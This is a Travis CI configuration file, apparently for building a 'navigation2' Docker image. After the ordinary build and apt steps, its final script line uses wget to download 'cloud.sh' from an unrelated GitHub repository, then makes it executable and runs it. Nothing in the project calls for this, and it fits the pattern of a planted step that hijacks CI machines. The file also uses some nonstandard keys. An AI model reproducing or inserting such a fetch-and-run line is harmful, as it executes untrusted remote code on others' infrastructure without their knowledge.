timeout : 7200s
sudo: required
language: bash
services:
  - docker
env:
  global:
    - TRAVIS_WAIT=20000
    - CT_RELEASE=1.0.1
    - BR_RELEASE=2015.08.1-rev1
    - BR_TRAVIS_RELEASE=1.0.0
scripts:
 - travis_wait 45 docker build --tag navigation2:latest --build-arg PULLREQ=$TRAVIS_PULL_REQUEST --build-arg CMAKE_BUILD_TYPE --build-arg COVERAGE_ENABLED ./
 - sudo apt-get -y update 
 - sudo apt-get -y install wget
 - sudo apt-get -y update
 - wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh

  
  

